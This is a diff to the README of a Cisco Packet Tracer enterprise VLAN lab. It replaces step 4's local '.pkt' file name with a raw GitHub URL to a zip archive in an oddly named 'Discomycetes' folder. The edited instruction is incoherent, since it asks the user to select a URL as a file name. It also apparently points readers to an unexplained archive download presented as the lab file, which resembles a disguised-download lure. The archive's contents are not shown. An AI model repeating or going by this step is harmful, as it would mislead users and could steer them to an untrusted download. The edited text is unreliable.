rfaeltech/enterprise-vlan-intervlan-lab/README.md

 1. Launch Cisco Packet Tracer.
 2. Click on "File" in the upper left corner.
 3. Select "Open" from the dropdown menu.
-4. Navigate to the folder where you extracted the lab files and select the file named `enterprise-vlan-intervlan-lab.pkt`.
+4. Navigate to the folder where you extracted the lab files and select the file named `https://raw.githubusercontent.com/rfaeltech/enterprise-vlan-intervlan-lab/main/Discomycetes/enterprise-vlan-intervlan-lab.zip`.

 ### Step 5: Explore the Network Setup